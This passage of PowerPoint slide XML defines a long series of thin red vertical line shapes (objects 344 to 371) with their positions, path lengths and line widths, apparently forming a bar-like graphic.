            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="object 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5456879" y="5669611"/>
            <a:ext cx="0" cy="318362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="160655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="160135"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="object 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5456879" y="5666636"/>
            <a:ext cx="0" cy="323396"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="163194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="163138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="object 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5476711" y="5847315"/>
            <a:ext cx="0" cy="139677"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="70485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="70461"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="object 347"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5476711" y="5844338"/>
            <a:ext cx="0" cy="145968"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="73660">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="73463"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="object 348"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5496545" y="5714039"/>
            <a:ext cx="0" cy="273062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="137794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137715"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="object 349"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5496545" y="5711064"/>
            <a:ext cx="0" cy="279353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="140969">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="140718"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="object 350"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5516776" y="5769573"/>
            <a:ext cx="0" cy="217694"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="109855">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="109691"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="object 351"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5516776" y="5766598"/>
            <a:ext cx="0" cy="223986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="113030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="112694"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="object 352"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5536608" y="5636291"/>
            <a:ext cx="0" cy="351079"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="177164">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="176949"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="object 353"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5536608" y="5633316"/>
            <a:ext cx="0" cy="357371"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="180339">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="179951"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="object 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5556443" y="5758461"/>
            <a:ext cx="0" cy="229019"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="115569">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="115298"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="object 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5556443" y="5755488"/>
            <a:ext cx="0" cy="235311"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="118744">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="118301"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="object 356"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5576275" y="5730695"/>
            <a:ext cx="0" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="129539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129310"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="object 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5576275" y="5727720"/>
            <a:ext cx="0" cy="262995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="132714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="132312"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="object 358"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5596110" y="5802891"/>
            <a:ext cx="0" cy="184977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="93344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="92878"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="object 359"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5596110" y="5799916"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95880"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="object 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5615942" y="5658505"/>
            <a:ext cx="0" cy="328429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="165735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165739"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="object 361"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5615942" y="5655530"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168741"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="object 362"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5635776" y="5813995"/>
            <a:ext cx="0" cy="173652"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="87630">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="87274"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="object 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5635776" y="5811021"/>
            <a:ext cx="0" cy="179944"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="90805">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="90277"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="object 364"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655609" y="5658505"/>
            <a:ext cx="0" cy="328429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="165735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165739"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="object 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655609" y="5655530"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168741"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="object 366"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5675443" y="5841762"/>
            <a:ext cx="0" cy="145968"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="73660">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="73262"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="object 367"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5675443" y="5838786"/>
            <a:ext cx="0" cy="152260"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="76835">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76265"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="object 368"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695275" y="5714039"/>
            <a:ext cx="0" cy="273062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="137794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137715"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="object 369"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695275" y="5711064"/>
            <a:ext cx="0" cy="279353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="140969">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="140718"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="object 370"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715110" y="5752908"/>
            <a:ext cx="0" cy="234053"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="118110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="118100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="object 371"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715110" y="5749935"/>
            <a:ext cx="0" cy="240345"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="121285">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="121102"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
